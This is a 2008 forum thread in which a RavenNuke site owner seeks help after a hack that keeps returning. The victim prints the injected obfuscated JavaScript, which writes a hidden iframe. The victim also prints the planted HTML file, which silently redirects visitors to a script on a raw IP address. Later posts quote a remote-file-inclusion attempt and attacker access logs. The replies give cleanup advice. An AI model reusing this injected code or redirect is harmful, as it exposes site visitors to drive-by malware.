script in each and every .php and .html files

New Member Joined: Mar 27, 2006 Posts: 17

hi there,

this script is written in each and every .php and .html file.

Code:




<script>


var temp="",i,c=0,out="";


var if_uniq_var="29102008";


var start_time="31 Oct 2008 19:38:00";


var str="60!105!102!114!97!109!101!32!115!114!99!61!34!105!112!111!100!115!117!120!120!46!104!116!109!108!34!32


!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";


l=str.length;


while(c<=str.length-1)


{


    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);


    c++;


    out=out+String.fromCharCode(temp);


    temp="";


}


document.write(out);


</script>

and this file ipodsuxx.html with code

Code:




<html>


<head>


<meta http-equiv="refresh" content="1;URL=http://91.203.93.49/cgi-bin/index.cgi?iu1">


</head>


<body>


</body>


</html>

is in every folder no matter how many times i remove and edit files.
i was using phpnuke 8.0 patched but two weeks back downgarded to RN 2.3 though this might solve my problem but this script and file keeps coming back .
can some one help me please how to solve my problem

[Admin: I split the code to avoid scrolling Smile

]

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Looks like you have been hacked and there is a script installed somewhere either on your server or w/i your root folder that is adding the code to your scripts. Hosting with DreamHost by any chance? See http://forum.joomlaworks.gr/index.php?topic=5212.0

Posted: Sat Nov 01, 2008 12:36 pm

I was conversing with a young guy on a forum elsewhere and his host (who will remain nameless Wink

) tried to charge the guy $275 to fix what they said was his problem on a fully managed VPS.
If I said it was the same problem it would give the game away so let me say it was a similar exploit.

Posted: Sat Nov 01, 2008 2:45 pm

Thanks for the reply,
no its not DreamHost,
i talked with them and they said they will upgrade the server using php 4.2 at the moment i guess.
is there any solution i mean if its installed in my root folder can i delete it?
thanks

Posted: Sat Nov 01, 2008 4:15 pm

Whether it's Dreamhost or not the issue is the same. Read that thread mentioned above and try to do what is outlined in it. 4.2 - YIKES! I'd find another host but regardless, if they think upgrading php is the answer then they don't have a clue. Bail while you have a chance Wink

Posted: Sat Nov 01, 2008 7:01 pm

I have to agree with Raven and for the same reasons.
If they think upgrading PHP (regardless of the version number) will fix anything that is very, very worrying.

registered · Posted: Sun Nov 02, 2008 12:52 am

Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.

Posted: Mon Nov 03, 2008 2:10 am

evaders99 wrote:

Your server is compromised. Without knowing how they got in, these hackers are just likely to continue using it to launch further attacks.

Figuring out how they got in would be ideal. You should really start from scratch and get a clean backup loaded.

i did that already 2 times.but no use these files keep coming back.

Posted: Mon Nov 03, 2008 3:52 am

Then that means either your backup contains the hacked scripts or the server itself is compromised. You will probably need to get your host involved to check the logs or whatever and help you locate the source and removal of the hack.

Posted: Mon Nov 03, 2008 6:25 am

i installed fresh RN 2.3 , didnt use the backup file

Posted: Mon Nov 03, 2008 8:28 am

Did you already scanned your system ?

http://www.symantec.com/security_response/writeup.jsp?docid=2008-080702-2357-99&tabid=3

or:

http://www.trendsecure.com/portal/en-US/tools/security_tools/housecall

Posted: Mon Nov 03, 2008 10:18 am

lokasher wrote:

i installed fresh RN 2.3 , didnt use the backup file

The it's a server issue and your host needs to get involved.

Posted: Mon Nov 03, 2008 3:24 pm

Susann wrote:

Did you already scanned your system ?

yes i did that,
scanned my pc and the backup files didnt find any thing.
then i searched for that script in all files, again all files were clear except the backend.php it contained the script.(maybe thats because the backup was created at the time when i was replacing the files) but im sure i replaced it with all the other files.
anyway today again i deleted all files and folders replaced with new ones.lets see now what happens.

Raven wrote:

The it's a server issue and your host needs to get involved.

this is what they told me

Thank you for using our services!

Please note that most of hackers' attacks are usually done through vulnerabilities of website software which you are using (like forums, blogs, CMS). We cannot keep them secured as we are not the developers of such kind of software. From our side, all server-side software (web services, FTP services, etc..) we are keeping up-to-date and protected. Anyway, it is strongly recommended to review everything that you have in website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

As we are using shared servers, it is not possible to perform server-side check of all the data being hosted. There are too much files and folders are hosted in customers directories, though we are performing the whole system updates and maintenance as frequently as it is needed. Thus all the viruses are uploaded to software or features installed on the server are removing automatically, but we are not responsible for the contents being placed to your domain directory.

The virus could be uploaded on the server when you made any update to your website from the local backup. I would recommend you to download all the site data to your local PC and scan the whole system for viruses including the website files. Then, please, re-upload it on the server.

Please, let us know if there is anything else we can help you with. We are available 24/7.

Posted: Mon Nov 03, 2008 3:47 pm

- Get a new host - seriously. These guys don't have a clue!

Check your foot1 - foot3 settings in your config table using phpMyAdmin to see if there's code in there that is redirecting to a hacker script.

Check your cgi-bin folder to see if there are scripts that don't belong in there.

This will not be a virus, per se. So scanning your scripts will not (necessarily) detect a "footprint" as virus scanners do. There is a script that is running either within your account files or on the server that has to be adding those files.

Make sure that when you are examining your site using FTP that your FTP client is being invoked with the remote file mask of -a.

Posted: Mon Nov 03, 2008 4:19 pm

That sounds like a typical standard answer from a hoster but its true they are not responsible for the content of your domain.

I personally believe one scan isn't enough to be sure a system isn't infected anymore.

Maybe you eliminated it with the new backend.php but I would still check my logs and files. RavenNuke(tm) is very safe. That's all I can tell you because I never had such a problem and I use Nuke and particular RavenNuke(tm) since years.

Btw: The webmaster from a Joomla site with the same issue also did not find anything when he scanned his PC. But like I said above that means nothing.

Posted: Mon Nov 03, 2008 6:06 pm

lokasher,

Did you find this file on your system - gz_eolas_fix.js?

Posted: Tue Nov 04, 2008 3:19 am

Raven wrote:

lokasher,

Did you find this file on your system - gz_eolas_fix.js?

Nope this file is nowhere either on my pc or the server.
Footer messages are clean and so is the cgi-bin folder.
Antivirus didnt detected the script in backend.php i found it by the text search in all files.just waiting till tomorrow to see what happens because the virus was coming back after 3 days.

Posted: Thu Nov 06, 2008 1:25 am

so far its ok nothing happened,hope it stays that way.
Thank you guys for your time and replies.

Posted: Thu Nov 06, 2008 1:36 am

Posted: Fri Nov 07, 2008 3:05 pm

im getting daily around 30 to 40 Blocked abuse emails from this link with different ip address any info whats this and how to block it permanently
thanks

Code:




Created By: NukeSentinel(tm) 2.6.01


Date &amp; Time: 2008-11-06 04:58:12 CST GMT -0600


Blocked IP: 118.6.230.117


User ID: Guest (1)


Reason: Abuse-Filter


--------------------


Referer: none


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP Host: www.xxxxxxx.com


Script Name: /modules.php


Query String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?


Get String: name=h**p://babycaleb.fortunecity.co.uk/index.htm?


Post String: Not Available


Forwarded For: none


Client IP: none


Remote Address: 118.6.230.117


Remote Port: 2397


Request Method: GET

Posted: Fri Nov 07, 2008 6:04 pm

Check this:

http://www.ravenphpscripts.com/postx14904-0-0.html

Posted: Sat Nov 08, 2008 7:42 am

Thanks once again .

Posted: Thu Nov 13, 2008 9:13 am

it started again.

2 days back i found strange file in root dir after deleting that i checked the log and i found this where this file was first called

Code:




85.17.184.28 - - [11/Nov/2008:09:52:45 -0600] "GET /fins.html HTTP/1.1" 301 316 "-" "Python-urllib/2.5"


85.17.184.28 - - [11/Nov/2008:09:52:46 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"


85.17.184.28 - - [11/Nov/2008:09:52:47 -0600] "GET /fins.html HTTP/1.1" 302 20840 "-" "Python-urllib/2.5"


85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /fins.html HTTP/1.1" 404 20840 "-" "Python-urllib/2.5"


85.17.184.28 - - [11/Nov/2008:09:52:48 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 301 324 "-" "Python-urllib/2.5"


85.17.184.28 - - [11/Nov/2008:09:52:49 -0600] "GET /xxxxxxx/fins.html HTTP/1.1" 404 15417 "-" "Python-urllib/2.5"

and today again an html file was in each n every folder plus the script was added to php and html extensions file
but this time the script was added only to the files in /admin,/blocks/shortlinks folders
in log

Code:




116.71.63.78 - - [13/Nov/2008:05:39:44 -0600] "GET /iu2.html HTTP/1.0" 200 135 "http://www.xxxxxx.com/" "Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1"

any help on this please

Posted: Thu Nov 13, 2008 11:18 am

Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files?

Posted: Thu Nov 13, 2008 12:58 pm

evaders99 wrote:

Was the server actually cleaned and reformatted? Or the only thing that was done was loading a clean RavenNuke 2.3 files?

Deleted old files and uploaded the RN 2.3 thats all.